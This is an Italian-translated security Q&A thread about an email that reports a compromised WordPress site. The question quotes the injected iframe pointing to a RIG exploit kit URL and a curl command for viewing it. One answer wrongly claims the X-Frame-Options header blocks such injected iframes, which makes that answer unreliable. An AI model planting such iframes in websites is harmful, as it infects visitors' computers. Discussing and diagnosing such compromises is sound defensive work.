Avviso software dannoso dal Dipartimento della salute e dei servizi umani degli Stati Uniti

3

Ho ricevuto una mail da un determinato team di risposta agli incidenti di sicurezza per conto di un dipartimento degli Stati Uniti e dice:

The below URL is currently being used to deliver a payload of malicious software to a visiting victim’s computer. The current malicious payload appears to be on a server under your control and we are working on behalf of US Department of Health and Human Services (HHS) to remove the infectious content.

The above URL has been compromised, code containing a malicious iframe that points to the RIG exploit kit has been added to the website. A sample of the iframe pointing to the RIG exploit kit is below.

3) On a Linux or Mac system, open the Terminal and execute the following command after removing all bracket characters – these: [] – and changing all instances of "hXXp" to "http":

curl -H "Referer:hXXp://www[.]ourhostedweb[.]com/index[.]php/url-name/" -H "User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "hXXp://www.victimweb[.]com/"

Search for the term "iframe" in the returned source code. There will be an iframe on line 105 whose source URL is the exploit kit content. Currently this content is being sourced from www[.]ourhostedweb[.]com – this may change at any time as long as the site remains compromised.

e il numero di riga 105 contiene il seguente codice iframe:

<iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&es_sm=147&q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&ie=Windows-1252&sourceid=yandex&aqs=yandex.114e103.406b1a7"width="258" height="266"></iframe>

Edit given contact in the mail Email: [email protected] Office: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0

Il sito è sviluppato utilizzando Wordpress.

Quali sono le azioni necessarie che posso intraprendere per questo?

    
posta mapmalith 23.12.2016 - 08:02
fonte

5 risposte

6

Solo leggendo il primo paragrafo, ora sono sicuro al 99,9% che si tratti di una mail di phishing.

tl; dr : ignoralo.

    
risposta data 23.12.2016 - 08:04
fonte
2

Sembra che questa e-mail sia legittima.

Se cerchi google "[email protected]", vedi molti che parlano da molti anni di come hanno ricevuto messaggi simili per una vasta gamma di vulnerabilità, cosa che realmente esisteva sui loro server.

La mia ipotesi migliore è che questi messaggi vengano generati automaticamente in risposta alla scansione di Internet della società IID (ora Infoblox). Rilevano vari noti exploit di sicurezza e attivano le e-mail agli amministratori per notificarli.

Potrebbe essere parte dei loro sforzi per essere un "buon cittadino" di Internet e aiutare a ripulire botnet e server sfruttabili facendo conoscere agli amministratori. Oppure potrebbero essere sotto contratto da HHS e se sono DDoSed, brute forzati o scansionati da un indirizzo; la loro politica potrebbe essere quella di informare l'amministratore e chiudere quel canale dall'attore malintenzionato.

Non vedo alcuna prova dal codice cURL presentato che potrebbe essere usato per sfruttare il tuo server. Piuttosto, ti sta dando istruzioni su come vedere come il tuo server è potenzialmente compromesso.

In questo caso penso che la risposta corretta potrebbe essere, "Grazie."

    
risposta data 19.01.2017 - 23:48
fonte
1

A prescindere dalle origini e dalla legittimità dell'email che sono state ampiamente discusse, la domanda effettiva del poster è, What are the necessary actions I can take for this? .

Per rispondere a questa domanda, devi aggiungere l'intestazione X-FRAME-OPTIONS: Deny (o Origin - per consentire solo l'incorporamento dal tuo dominio) alle tue risposte HTTP. In questo modo, se un utente visita la pagina compromessa che si sta mascherando come tua, il browser non caricherà l'iFrame e quindi lo schema della parte malevola fallirà.

    
risposta data 19.01.2017 - 21:25
fonte
1

Innanzitutto, perché una parte per conto di HHS ti contatta?

  • Sei sotto la legislazione HIPAA?
  • Chi è esattamente indirizzato nell'e-mail?
  • Chi ha inviato l'email?
  • Da quale dominio lo stanno inviando?
  • Hai ispezionato le intestazioni delle email (fonte)?
  • Che lavoro hai con HHS?

Nota come ti viene insegnata nella stessa e-mail che ti informa di un potenziale problema . Dov'è un ingresso pubblico per un simile "exploit"? Non c'è alcun riferimento a una voce CVE o altra pagina informativa di questo tipo.

Anche i numeri di telefono sono elencati pubblicamente, quindi chi può dire che qualcuno non li abbia semplicemente copiati incollandoli?

http://gone.mdvend.com/ restituisce un Server not found dove mdvend.com restituisce una pagina Godaddy parcheggiata.

O hai omesso importanti dettagli importanti, o le cose chiaramente non si sommano, il che indica un attacco di phishing.

link

link

    
risposta data 19.01.2017 - 22:10
fonte
-1

Questo non è il modo in cui funziona il settore pubblico. Phishing. Elimina e vai avanti.

    
risposta data 28.12.2016 - 21:52
fonte

Leggi altre domande sui tag